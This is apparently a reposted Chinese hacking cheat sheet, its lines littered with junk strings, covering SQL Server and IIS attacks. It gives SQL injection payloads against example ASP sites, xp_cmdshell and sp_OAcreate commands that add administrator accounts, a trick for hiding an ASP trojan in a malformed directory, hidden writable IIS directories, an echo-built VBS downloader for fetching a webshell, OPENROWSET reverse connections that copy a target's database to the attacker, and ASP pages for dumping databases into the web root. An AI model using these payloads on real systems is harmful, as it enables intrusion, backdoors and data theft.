and (select count(*) from temp2 where dir<>'user')<(select count(*) from temp2)
如果返回为真，为了确定我们的判断，多测试几个例子，方法上面都讲到了，如果多个例子都返回为真，那么就确定了该目录为WEB根目录。

- @! s7 R- t8 Y# X) C( c& v. P
. @" d* @( G- I# g用以上的方法基本上可以获得WEB根目录，现在我们假设WEB根目录是：D:\website\www
然后，我们就可以备份当前数据库到这个目录下用来下载。备份前我们把temp、temp1、temp2的内容清空，然后C、D、E盘的目录树分别存到temp、temp1、temp2中。

" h# ?1 H9 |3 I5 r- L8 Y. t" Y下载完数据库后要记得把三个临时表drop掉，现在我们在下载的数据库中可以找到所有的目录列表，包括后台管理的目录以及更多信息。
- [9 f' Q9 l3 D* C
21、win2000下将WEB用户提升为系统用户权限，需要有管理员的权限才能执行：
c:\>cscript C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll" "C:\winnt\system32\inetsrv\asp.dll"
8 f* ]& N1 U$ |, X, l1 t- y
2 {4 Y: T9 a3 e% o0 p. W: q, ocscript C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\windows\system32\idq.dll" "C:\windows\system32\inetsrv\httpext.dll" "C:\windows\system32\inetsrv\httpodbc.dll" "C:\windows\system32\inetsrv\ssinc.dll" "C:\windows\system32\msw3prt.dll" "C:\windows\system32\inetsrv\asp.dll"
& c9 n% l$ m+ Y9 X. g! _
查看是否成功：
8 V9 Z2 A% G8 k) [4 @c:\>cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps
9 t( n+ P' {$ V$ L- C8 a# o3 k
Microsoft (R) Windows Script Host Version 5.6
版权所有(C) Microsoft Corporation 1996-2001。保留所有权利。
inprocessisapiapps        : (LIST) (6 Items)
8 B4 M  V% t; R1 Z"C:\WINNT\system32\idq.dll"
"C:\WINNT\system32\inetsrv\httpext.dll"
"C:\WINNT\system32\inetsrv\httpodbc.dll"
7 U: T  |# N7 R( X2 r"C:\WINNT\system32\inetsrv\ssinc.dll"
4 W) U  F% X5 j0 d: f% \6 G"C:\WINNT\system32\msw3prt.dll"
  T0 y) Q% B6 X. s9 {; s"c:\winnt\system32\inetsrv\asp.dll"
( a- I' F7 y5 [* k8 _7 u% ^' Y( \. [
22、如何隐藏ASP木马：
建立非标准目录：mkdir images..\
拷贝ASP木马至目录：copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
通过web访问ASP木马：http://ip/images../news.asp?action=login
如何删除非标准目录：rmdir images..\ /s
8 g# ~# v2 F5 Q* q  p
3 e, V/ |4 }6 Q! O4 ?0 G/ e23、去掉tenlnet的ntlm认证：
  q' h! u8 e1 }( g9 e;exec master.dbo.xp_cmdshell 'tlntadmn config sec = -ntlm'—

24、用echo写入文件下载脚本iget.vbs:
(1)echo Set x= createObject(^"Microsoft.XMLHTTP^"):x.Open ^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s = createObject(^"ADODB.Stream^"):s.Mode = 3:s.Type = 1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >c:\iget.vbs
; L: e6 _  V# Z% Y2 i) v( M
; m3 P+ k6 L! a! p; ](2)c:\>cscript iget.vbs http://127.0.0.1/asp/dbm6.asp dbm6.asp


25、手工建立IIS隐藏目录的方法：
?    查看本地虚拟目录列表：cscript.exe c:\inetpub\AdminScripts\adsutil.vbs enum w3svc/1/root
?    新建一个kiss目录：mkdir c:\asp\kiss
; h* A9 R5 S. s% y- t. l?    建立kiss虚拟目录：cscript.exe c:\inetpub\AdminScripts\mkwebdir.vbs -c MyComputer -w "Default Web Site" -v "kiss","c:\asp\kiss"   
?    为kiss目录加执行和写权限：
cscript.exe c:\inetpub\AdminScripts\adsutil.vbs set w3svc/1/root/kiss/kiss/accesswrite "true" -s:
+ E# `9 B0 Q) L5 M; g; vcscript.exe c:\inetpub\AdminScripts\adsutil.vbs set w3svc/1/root/kiss/accessexecute "true" -s:
2 _0 N5 _4 I, m, O/ k  h: b?    ?:Cscript c:\inetpub\AdminScripts\adsutil.vbs set /w3svc/1/root/kiss/createprocessasuser false
?    访问：http://127.0.0.1/kiss/test.asp
7 o& r8 [# p- y, l& s1 A
. @* Z, b  f6 y5 e% E

/ l( j: Q. k* ^& f( P26、使用openrowset()连回本地做测试：
select a.*
FROM OPENROWSET('SQLOLEDB','127.0.0.1';'sa';'111111',
1 V# E4 y' g/ j9 R; \'select * FROM [dvbbs].[dbo].[dv_admin]') AS a
  v' A7 F  c2 i% L
& M& a1 w  X  X' {select * FROM OPENROWSET('SQLOLEDB','127.0.0.1';'sa';'111111',
'select * FROM [dvbbs].[dbo].[dv_admin]')

  g# [8 Y7 i) [# j# J27、获得主机名：
3 {' J" u# T7 t! [( u# Z1 V" }) s; J9 _http://www.xxxx.com/FullStory.asp?id=1 and 1=convert(int,@@servername)--
select convert(int,@@servername)
. A% E. a! \& ~4 L2 p0 wselect @@servername

( }! J! Q# P- ~: [# o& {28、获得数据库用户名：
$ I5 m+ \+ i4 L1 L. Ehttp://www.XXXX.com/FullStory.asp?id=1 and 1=convert(int,system_user)--
http://www.19cn.com/showdetail.asp?id=49 and user>0
' ~2 |1 ]' s0 w1 g  z! zselect user

29、普通用户获得WEBSHELL的方法之二：
2 C; y$ A' ~4 b# K  C" N?    打包：
! E9 `; G6 I4 ]! bEXEC [master].[dbo].[xp_makecab] 'c:\test.rar','default',1,'d:\cmd.asp'
; A& W% t- Y) P& V  G9 ^6 Y. r解包，可以用于得到webshell：
?    EXEC [master].[dbo].[xp_unpackcab] 'C:\test.rar','c:',1, 'n.asp'
( E) x' m" j; b$ x, v?    读任意文件内容，要求有master的dbo权限：
EXEC [master].[dbo].[xp_readerrorlog] 1,'c:\cmd.asp'

30、sa 权限下已知web路径直接备份数据库到web路径下

% i6 R. O8 t5 x1 Whttp://www.XXXX.com/FullStory.asp?id=1;backuup database 数据库名 to disk='c:\inetpub\wwwroot\save.db' 则把得到的数据内容全部备份到WEB目录下，再用HTTP把此文件下载(当然首选要知道WEB虚拟目录)。
2 i' |' X0 K& I: \
?    遍历系统的目录结构，分析结果并发现WEB虚拟目录，先创建一个临时表：temp
% l# o9 X1 E" p% \+ ^+ chttp://www.XXXX.com/FullStory.asp?id=1;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
?    　接下来：我们可以利用xp_availablemedia来获得当前所有驱动器,并存入temp表中：
http://www.XXXX.com/FullStory.asp?id=1;insert temp exec master.dbo.xp_availablemedia;--
?    我们可以通过查询temp的内容来获得驱动器列表及相关信息或者利用xp_subdirs获得子目录列表,并存入temp表中：
' |$ e; @. ]5 o8 X. U% D4 M( y! nhttp://www.XXXX.com/FullStory.asp?id=1;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';--
7 l2 ]% y+ j) [$ t: k  }( G?    我们还可以利用xp_dirtree获得所有子目录的目录树结构,并寸入temp表中：
http://www.XXXX.com/FullStory.asp?id=1;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 这样就可以成功的浏览到所有的目录（文件夹）列表
?    如果我们需要查看某个文件的内容，可以通过执行xp_cmdsell：;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';--
0 W* p8 ~7 g- F, k$ s0 H?    使用'bulk insert'语法可以将一个文本文件插入到一个临时表中。如：bulk insert temp(id) from 'c:\inetpub\wwwroot\index.asp'    浏览temp就可以看到index.asp文件的内容了！通过分析各种ASP文件，可以得到大量系统信息，WEB建设与管理信息，甚至可以得到SA帐号的连接密码。

31、一些sql中的扩展存储的总结:
+ I  n2 L% U. ^+ y/ Ixp_availablemedia 显示系统上可用的盘符'C:\' xp_availablemedia
xp_enumgroups 列出当前系统的使用群组及其说明 xp_enumgroups
xp_enumdsn 列出系统上已经设置好的ODBC数据源名称 xp_enumdsn
xp_dirtree 显示某个目录下的子目录与文件架构 xp_dirtree 'C:\inetpub\wwwroot\'
9 j) T& J8 F3 Rxp_getfiledetails 获取某文件的相关属性 xp_getfiledetails 'C:\inetpub\wwwroot.asp'
dbp.xp_makecab 将目标计算机多个档案压缩到某个档案里所压缩的档案都可以接在参数的后面用豆号隔开 dbp.xp_makecab 'C:\lin.cab','evil',1,'C:\inetpub\mdb.asp'
xp_unpackcab 解压缩 xp_unpackcab 'C:\hackway.cab','C:\temp',1
0 r1 V# @; i9 x% O  `xp_ntsec_enumdomains 列出服务器域名 xp_ntsec_enumdomains
# x1 ]' Q& C5 l* H, @xp_servicecontrol 停止或者启动某个服务 xp_servicecontrol 'stop','schedule'
xp_terminate_process 用pid来停止某个执行中的程序 xp_terminate_process 123
! x( N: F4 E8 d8 W3 c- idbo.xp_subdirs 只列某个目录下的子目录 dbo.xp_subdirs 'C:\'
. _  j, N4 q" s
32、
: [; F) c3 `* K1 D2 \USE MASTER
GO
: h; e$ s5 ]7 u4 a) {create proc sp_MSforeachObject
" E/ H  z6 F2 G8 q@objectType int=1,
; i6 S  j0 {- v5 S* a@command1 nvarchar(2000),
@replacechar nchar(1) = N'?',
2 i7 {" j1 a8 e5 e/ R. x" q7 h@command2 nvarchar(2000) = null,
@command3 nvarchar(2000) = null,
; K) z/ M' s/ f! b: y* p1 N% j@whereand nvarchar(2000) = null,
% H3 q  Q7 O, w$ {# w* ?" f@precommand nvarchar(2000) = null,
@postcommand nvarchar(2000) = null
as
/* This proc returns one or more rows for each table (optionally, matching @where), with each table defaulting to its
own result set */
/ ?: h, ?' B& L4 Y- x/* @precommand and @postcommand may be used to force a single result set via a temp table. */
/* Preprocessor won't replace within quotes so have to use str(). */
declare @mscat nvarchar(12)
2 x9 k# O  k: s3 Q; `select @mscat = ltrim(str(convert(int, 0x0002)))
if (@precommand is not null)
1 p2 a, E( K" B3 O& [( Bexec(@precommand)
3 q. [$ z+ h5 f1 v8 y/* Defined @isobject for save object type */
Declare @isobject varchar(256)
' v4 G: @. E7 k( a+ J+ _% s" J. Fselect @isobject= case @objectType when 1 then 'IsUserTable'
$ r& w& _# y2 o  Hwhen 2 then 'IsView'
when 3 then 'IsTrigger'
  q, R6 x8 h) S8 `; c5 y; d3 P3 k0 iwhen 4 then 'IsProcedure'
when 5 then 'IsDefault'
, A- g* X+ C4 M) Nwhen 6 then 'IsForeignKey'
when 7 then 'IsScalarFunction'
3 j" I! N9 ~1 Z" ~when 8 then 'IsInlineFunction'
1 N7 F8 O, y) m  S. L9 nwhen 9 then 'IsPrimaryKey'
when 10 then 'IsExtendedProc'
/ u9 W) e: G0 ^* G- {when 11 then 'IsReplProc'
when 12 then 'IsRule'
$ K) O3 N+ I3 O- [     end
/* create the select */
/* Use @isobject variable isstead of IsUserTable string */
6 f' @) Q/ U$ N( W6 P! k! Q, B- }EXEC(N'declare hCForEach cursor global for select ''['' + REPLACE(user_name(uid), N'']'', N'']]'') + '']'' + ''.'' + ''['' +
REPLACE(object_name(id), N'']'', N'']]'') + '']'' from dbo.sysobjects o '
+ N' where OBJECTPROPERTY(o.id, N'''+@isobject+''') = 1 '+N' and o.category & ' + @mscat + N' = 0 '
8 D" z1 k" g0 H+ @whereand)
" E) I% y* D+ T0 A" l0 }declare @retval int
select @retval = @@error
- H: F, F. e+ E2 Aif (@retval = 0)
     exec @retval = sp_MSforeach_worker @command1, @replacechar, @command2, @command3
if (@retval = 0 and @postcommand is not null)
# B/ C. O7 J" q& g, {5 d- s     exec(@postcommand)
return @retval
1 `- X5 F  `- ?8 CGO
2 w6 `& g% P0 o( [
$ ^5 z3 P* \. M" a1 \$ K
$ T. D  V! ^) q. r/*
1。获得所有的存储过程的脚本：
+ J! _* R) v* }1 o4 B( `EXEc sp_MSforeachObject @command1="sp_helptext '?' ",@objectType=4
2。获得所有的视图的脚本：
0 c9 D: {4 R5 ]: `6 I& wEXEc sp_MSforeachObject @command1="sp_helptext '?' ",@objectType=2

EXEc sp_MSforeachObject @command1="sp_changeobjectowner '?', 'dbo'",@objectType=1
EXEc sp_MSforeachObject @command1="sp_changeobjectowner '?', 'dbo'",@objectType=2
: i. v: X7 H3 j# Q3 a( D9 C* e/ hEXEc sp_MSforeachObject @command1="sp_changeobjectowner '?', 'dbo'",@objectType=3
EXEc sp_MSforeachObject @command1="sp_changeobjectowner '?', 'dbo'",@objectType=4
" ~" S& W+ i/ r+ D) t*/

33、DB_OWNER权限下的数据库备份方法
用openrowset吧。反连到自己的数据库机器，~先在本地建个跟目标机器一样结构的表~字段类型使用nvarchar.然后用海洋连接对方的SQL数据库，在查询分析那里执行
insert into OPENROWSET ('sqloledb','server=你数据库服务器的IP;uid=user;pwd=pass;database=dbname; ','select * from 你建立的表) select * from 对方的表—
0 V6 p, l, g4 t3 l+ x. l- T$ w要是数据量太大的话就看看他数据库里有没有自动编号的字段.select * from 表名 where id>100
这样来弄吧
7 ^5 t! }& u9 I6 a0 f7 U! s# D要是和WEB同台的话，直接将库BAK到WEB目录下回来就OK啦。。。不过前提库不能太大，超过2G的话SQL就超时了
如果是SA权限可以利用下面的两个ASP程序来备份数据库：

0 Y' b, ?) t' b$ G- s- |sqlbackup1.asp
! |; V0 n3 ?3 H% e& M, _4 ]<HTML>
) z/ [9 X. ~! q' l  ?<HEAD>
6 D# D) d" t6 H$ e/ A9 h<TITLE>SQL Server 数据库的备份与恢复</TITLE>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
& M& v! d9 r4 h# m</HEAD>
<BODY>
4 B7 z9 d2 o9 G- K<form method="post" name=myform>
! @* c1 g0 t* x; e: ]选择操作：<INPUT TYPE="radio" NAME="act" id="act_backup" value="backup"><label for=act_backup>备份</label>　
3 X9 e' Y% U& S4 g<INPUT TYPE="radio" NAME="act" id="act_restore" value="restore"><label for=act_restore>恢复</label>
6 l/ y9 G2 W$ k; w$ l- s+ l<br>数据库名：<INPUT TYPE="text" NAME="databasename" value="<%=request("databasename")%>">
2 [8 E, o; Q: q" V<br>文件路径：<INPUT TYPE="text" NAME="bak_file" value="c:\1.exe">(备份或恢复的文件路径,备份成EXE主要为了方便下载,活活..)<br>
<input type="submit" value="确定">
$ h5 Q9 R2 Z. j3 R</form>
<%
dim sqlserver,sqlname,sqlpassword,sqlLoginTimeout,databasename,bak_file,act
sqlserver = "localhost" 'sql服务器
$ Y; n# ]. a6 i7 b) |sqlname = "sa" '用户名
$ X2 M' x' a7 T" `9 Isqlpassword = "数据库密码" '密码
sqlLoginTimeout = 15 '登陆超时
5 X+ V1 ]9 O( |( L' r0 e9 c; D9 `# Tdatabasename = trim(request("databasename"))
bak_file = trim(request("bak_file"))
. x( e9 [* c1 ~8 A2 @bak_file = replace(bak_file,"$1",databasename)
3 O4 c6 [  O( T! y2 ~- X' oact = lcase(request("act"))
  M; a7 R  V9 m; R6 cif databasename = "" then
4 i; X$ J/ S8 m' l! E$ _response.write "input database name"
$ T  H' z$ {$ @+ f/ _else
if act = "backup" then
Set srv=Server.createObject("SQLDMO.SQLServer")
# @/ `# z4 O( q' qsrv.LoginTimeout = sqlLoginTimeout
+ [' z0 v, b. i' ^( Rsrv.Connect sqlserver,sqlname, sqlpassword
Set bak = Server.createObject("SQLDMO.Backup")
8 z0 ]: \% c) s, Dbak.Database=databasename
bak.Devices=Files
$ t: k0 x: b" @8 Xbak.Files=bak_file
$ [5 e+ Z3 `9 x. f  }; Mbak.SQLBackup srv
& U  y8 H) K! h$ W/ O4 z$ V0 nif err.number>0 then
9 Z+ i0 a7 r; L* k# W3 @7 Iresponse.write err.number&"<font color=red><br>"
response.write err.description&"</font>"
" \2 n7 r* U7 k# `) Hend if
0 c& [$ n3 o# o6 \+ QResponse.write "<font color=green>备份成功!</font>"
elseif act = "restore" then
'恢复时要在没有使用数据库时进行！
1 i: B! z9 x6 CSet srv=Server.createObject("SQLDMO.SQLServer")
srv.LoginTimeout = sqlLoginTimeout
; j" w+ E9 u; ^  U2 X( }' }- J$ osrv.Connect sqlserver,sqlname, sqlpassword
7 B: u5 l- q$ H$ wSet rest=Server.createObject("SQLDMO.Restore")
% R( {6 H# p0 B3 Frest.Action=0 ' full db restore
/ I# M' ^, g1 j6 brest.Database=databasename
$ |; `5 M  |' H2 O) @rest.Devices=Files
% v' i' ?4 k# ~( Lrest.Files=bak_file
7 N( H/ B) o) V' a; [rest.ReplaceDatabase=True 'Force restore over existing database
5 {& N1 [9 N$ f  G3 f+ j% Aif err.number>0 then
. d, I. B2 ~( n) Kresponse.write err.number&"<font color=red><br>"
response.write err.description&"</font>"
  K, c7 e* D$ v! u7 G# w& Oend if
rest.SQLRestore srv

Response.write "<font color=green>恢复成功!</font>"
! x$ c& Q1 J/ ?& W0 jelse
; f/ Y- f9 X4 G8 A; b  y& G. u) oResponse.write "<font color=red>没有选择操作</font>"
) V3 T1 s. f; s" xend if
end if
* Z7 j# Z5 k. K& ^+ Y/ l7 V0 j%>
</BODY>
& W, \" F( ?6 u/ G4 D  t</HTML>
8 d" {. S- D! L. Q4 a7 c% u+ v0 N
' i: q; r8 z% v0 _sqlbackup2.asp
) L7 E2 M/ z- i, I<%@LANGUAGE="VBSCRIPT" CODEPAGE="936"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
! m- `3 A0 r! ?: V; n( n, C<html xmlns="http://www.w3.org/1999/xhtml">
<head>
: X3 v8 l* |' L" K; ~<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
2 d* P$ C% h" |<title>采飞扬ASP备份MSSQL数据库程序 V1.0--QQ:79998575</title>
</head>
) J5 J6 b  p4 W) u<style>
9 E& W; X7 g1 }" i7 bBODY {    FONT-SIZE: 9pt;    COLOR: #000000;    FONT-FAMILY: "Courier New";    scrollbar-face-color:#E4E4F3;    scrollbar-highlight-color:#FFFFFF;    scrollbar-3dlight-color:#E4E4F3;    scrollbar-darkshadow-color:#9C9CD3;    scrollbar-shadow-color:#E4E4F3;    scrollbar-arrow-color:#4444B3;    scrollbar-track-color:#EFEFEF;}TABLE {    FONT-SIZE: 9pt;    FONT-FAMILY: "Courier New";    BORDER-COLLAPSE: collapse;    border-top-width: 1px;    border-right-width: 1px;    border-bottom-width: 1px;    border-left-width: 1px;    border-top-style: solid;    border-right-style: none;    border-bottom-style: none;    border-left-style: solid;    border-top-color: #d8d8f0;    border-right-color: #d8d8f0;    border-bottom-color: #d8d8f0;    border-left-color: #d8d8f0;}.tr {    font-family: "Courier New";    font-size: 9pt;    background-color: #e4e4f3;    text-align: center;}.td {    font-family: "Courier New";    font-size: 9pt;    background-color: #f9f9fd;}.warningColor {    font-family: "Courier New";    font-size: 9pt;    color: #ff0000;}input {
8 k% N+ t( t0 B8 y4 K' w( a  n. i7 Ufont-family: "Courier New";
BORDER-TOP-WIDTH: 1px;
BORDER-LEFT-WIDTH: 1px;
FONT-SIZE: 12px;
7 Y. U1 W! ^/ }" ]* n! PBORDER-BOTTOM-WIDTH: 1px;
BORDER-RIGHT-WIDTH: 1px;
color: #000000;
}textarea {    font-family: "Courier New";    BORDER-TOP-WIDTH: 1px;    BORDER-LEFT-WIDTH: 1px;    FONT-SIZE: 12px;    BORDER-BOTTOM-WIDTH: 1px;    BORDER-RIGHT-WIDTH: 1px;    color: #000000;}.liuyes {
- W7 J' u; Q# ^$ C) S9 abackground-color: #CCCCFF;
1 m/ E% ?% e% }8 z7 B& ~$ y}
+ m6 \$ p! \1 R. Z  o- gA:link {    FONT-SIZE: 9pt;    COLOR: #000000;    FONT-FAMILY: "Courier New";    TEXT-DECORATION: none;}tr {    font-family: "Courier New";    font-size: 9pt;    line-height: 18px;}td {    font-family: "Courier New";    font-size: 9pt;    border-top-width: 1px;    border-right-width: 1px;    border-bottom-width: 1px;    border-left-width: 1px;    border-top-style: none;    border-right-style: solid;    border-bottom-style: solid;    border-left-style: none;    border-top-color: #d8d8f0;    border-right-color: #d8d8f0;    border-bottom-color: #d8d8f0;    border-left-color: #d8d8f0;}.trHead {    font-family: "Courier New";    font-size: 9pt;    background-color: #e4e4f3;    line-height: 3px;}.inputLogin {    font-family: "Courier New";    font-size: 9pt;    border: 1px solid #d8d8f0;    background-color: #f9f9fd;    vertical-align: bottom;}</style>
<body>
<form method="post" name="myform" action="?action=backupdatabase">
- p3 k6 P, K. `4 ?; f; N<table width="686" border="1" align="center">
* q$ F' |8 t9 M( ^$ a  H& G<tr>
6 A& _4 Q6 ]; ?; m; @$ H2 m<td width="613" height="30" align="center" bgcolor="#330066"><font color="#FFFFFF">采飞扬ASP备份MSSQL数据库程序 V1.0 </font></td>
0 A& m8 v' k9 H# O$ w6 q4 T: r</tr>
0 a! J6 g) Y0 K6 ?<tr>
<td>选择操作：
   <input type="radio" name="act" id="act_backup"value="backup" />
   <label for=act_backup>备份</label>
   <input type="radio" name="act" id="act_restore" value="restore" />
   <label for=act_restore>恢复</label></td>
</tr>
<tr>
' P+ [- n; L8 X; _& t. [<td><label>SQL服务器:
9 C' P) {- i" J4 B; H: h) h; _   <input type="text" name="sqlserver" value="localhost" />
</label></td>
% [+ N/ z, v* k6 r* t</tr>
, ?& {2 o5 v& c( n' m9 s( M  j- J<tr>
3 C$ N# `8 V5 F+ k$ M7 G<td><label>用户名:
0 R) Z5 Y$ X1 Z% ~/ e! @, D   <input name="sqlname" type="text" value="sa" />
( v  W, g, t9 P- [9 {4 ~; b密 码:
<input type="text" name="sqlpassword" />
</label></td>
</tr>
$ s7 D) l9 v- j' k: F, e! T<tr>
<td><label>数据库名：
   <input type="text" name="databasename" value="<%=request("databasename")%>" />
  k$ M- n% K  ~; d</label></td>
</tr>
<tr>
<td>文件路径：
   <input name="bak_file" type="text" value="<% =server.MapPath("\")&"\"&"liuyes.bak"%>" size="60" />
* I" [6 c  y$ |# y(备份或恢复的文件路径)</td>
+ s# Z# D3 c' C; a$ b5 z! D1 w</tr>
  w; n$ P7 m+ _/ S& |2 g<tr>
<td><% Response.write "本文件绝对路径:" %>
   <font color="#FF0000">
0 i/ a7 x! f- E* G! V& p" S6 ?   <% =server.mappath(Request.ServerVariables("SCRIPT_NAME")) %>
, c% t( Z8 |$ b; k   </font></td>
: y* C0 i0 Y# F6 O2 U</tr>
$ O, x) ^( [: E( r1 Y1 E<tr>
  x( ]) q' ^* ^  c' {1 I<td><input name=submit1 type="submit" class="liuyes" id=submit1 size="10" value="确 定" />
1 M. {5 Z4 E5 s5 `0 i     <input name="Submit" type="reset" class="liuyes" size="10" value="重 置" /></td>
, P; V7 n. @! P/ u) N5 j% i</tr>
5 `9 p, H3 O. T0 G( F</table>
</form>
, g0 p9 ?- z& l6 H/ y3 h<table width="686" border="1" align="center">
" ?* u* ^8 }7 _  u) b- y: w* a<tr>
<td>提示信息:<%
if request("action")="" then   
; ?' @! H4 I6 |; f# z( U6 v0 jresponse.write "<font color=#ff0000>不用我多说什么了吧！</font>"
0 C" ~# \/ h0 V, X9 J$ Z- l5 V. s' fend if
$ J4 M6 X3 @6 {9 r'SQL Server 数据库的备份与恢复!
/ J3 Y- w/ t$ e1 K& j  nif request("action")="backupdatabase" Then
dim sqlserver,sqlname,sqlpassword,sqlLoginTimeout,databasename,bak_file,act
& @4 I4 i( n) N% M9 o0 A2 t! psqlserver = trim(request("sqlserver"))
: q7 F: Z: R, Z4 rsqlname = trim(request("sqlname"))
sqlpassword =trim(request("sqlpassword"))
6 L  v6 d! B; {; P" D  ?" i; `, m4 asqlLoginTimeout = 15
' i4 h! Z, W# f2 r: |databasename = trim(request("databasename"))
bak_file = trim(request("bak_file"))
bak_file = replace(bak_file,"$1",databasename)
! P1 _3 [+ k) O& t; {, l" ]9 b+ k# Kact = lcase(request("act"))
if databasename = "" then
response.write "<font color=#ff0000>没有输入数据库名称!</font>"
else
, e& X+ X& T1 yif act = "backup" then
Set srv=Server.createObject("SQLDMO.SQLServer")
srv.LoginTimeout = sqlLoginTimeout
srv.Connect sqlserver,sqlname, sqlpassword
& g% }' C5 k9 T5 cSet bak = Server.createObject("SQLDMO.Backup")
bak.Database=databasename
bak.Devices=Files
bak.Action    = 0
bak.Initialize    = 1
1 E. ?1 w/ }2 ^1 p0 s' H'bak.Replace    = True
bak.Files=bak_file
bak.SQLBackup srv
3 b' O/ c- i! x9 F' zif err.number>0 then
response.write err.number&"<font color=red><br>"
response.write err.description&"</font>"
end if
Response.write "<font color=green>备份成功!</font>"
elseif act="restore" then
9 f" f9 b: O( T% f% K* M6 y'恢复时要在没有使用数据库时进行！
Set srv=Server.createObject("SQLDMO.SQLServer")
srv.LoginTimeout = sqlLoginTimeout
srv.Connect sqlserver,sqlname, sqlpassword
' O! c8 g" F6 i! `5 M' ]Set rest=Server.createObject("SQLDMO.Restore")
rest.Action=0 ' full db restore
rest.Database=databasename
rest.Devices=Files
2 f* d# E- k3 _rest.Files=bak_file
rest.ReplaceDatabase=True 'Force restore over existing database
if err.number>0 then
& f0 V* F% L; \3 x6 x1 x, kresponse.write err.number&"<font color=red><br>"
response.write err.description&"</font>"
. n2 e8 z7 h2 ]9 V$ M0 Dend if
rest.SQLRestore srv
Response.write "<font color=green>恢复成功!</font>"
else
% [7 K, e+ K+ \( |- z6 E9 UResponse.write "<font color=red>请选择备份或恢复!</font>"
2 X# J% j* X# a8 M, M7 bend if
end if
3 C/ U! P% S  vend if
9 U! Q& S1 I, H3 a/ p  Y+ S%></td>
</tr>
</table>
- c7 t7 t9 `* R1 M</body>
</html>


. b! |: t, S6 J$ c+ ^* Y) M: m
2 G7 e8 ]4 s* i6 G) h( I  B                                                                                                   (2)
7 o$ {9 v3 V0 W6 y- t! m//看看是什么权限的
* c' d. D6 M) F" Vand 1=(Select IS_MEMBER('db_owner'))
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
6 |1 K2 X" U/ E- I3 b
//检测是否有读取某数据库的权限
* g( j& W# U) \1 Zand 1= (Select HAS_DBACCESS('master'))
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
7 b, ^3 Y! B! {. t6 e

8 X2 J& T# {8 d! H  O% y( X数字类型
and char(124)%2Buser%2Bchar(124)=0

字符类型
' and char(124)%2Buser%2Bchar(124)=0 and ''='
' E1 v, @& q+ F: p, p
搜索类型
2 J& |# p. ]5 ]% ^- X( f' and char(124)%2Buser%2Bchar(124)=0 and '%'='

; }6 Q9 r% R9 P$ h, S9 `爆用户名
and user>0
' and user>0 and ''='

检测是否为SA权限
  k$ v( G) r+ C. rand 1=(select IS_SRVROLEMEMBER('sysadmin'));--
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --

" ]5 m7 [: D4 E. \检测是不是MSSQL数据库
. b9 h# T5 B5 @and exists (select * from sysobjects);--

9 K$ `" a6 @5 b: x& n检测是否支持多行
;declare @d int;--
8 Y0 Z+ y+ O5 `/ Z& j$ W8 X+ a
恢复 xp_cmdshell
5 h' p% m  t8 g: H5 B; ~: l;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--

( ^9 m: _! }4 Q' m) |3 @6 s
6 U1 t8 [7 {; k: G9 ]: uselect * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')

//-----------------------
//       执行命令
$ t5 d* f) L8 C, |& o8 G" x/ P! g//-----------------------
首先开启沙盘模式：
: e5 K  \" V: c3 t3 j: bexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
! v3 S  }) D  A; e
然后利用jet.oledb执行系统命令
% U3 e  H6 }9 q4 B" N# B$ _( Wselect * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')

执行命令
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
* M6 `7 ?  m. X2 D- @/ x* `
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
# F5 O, b; b. V% d0 Z5 \
判断xp_cmdshell扩展存储过程是否存在：
8 C1 r8 O2 w+ l" ]+ Z0 q1 ]3 ehttp://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
1 Y0 i5 z+ H3 _% I! S
写注册表
! I; P! p: B3 S  hexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

REG_SZ
* v$ d) b2 K) _0 ?# J6 ^# T; F% W
读注册表
7 p" L) B4 U0 P5 `' f6 nexec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
' T* q; y4 o: w5 ~5 m0 N, p
  {" ~$ Y8 X# N$ c! M9 c读取目录内容
exec master..xp_dirtree 'c:\winnt\system32\',1,1


6 N) M' U4 @' c! B数据库备份
backup database pubs to disk = 'c:\123.bak'
1 j, O) o, B  p5 Y7 C, q
//爆出长度
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--



更改sa口令方法：用sql综合利用工具连接后，执行命令：
0 v8 }- j9 P- o# ^5 [* a8 Gexec sp_password NULL,'新密码','sa'
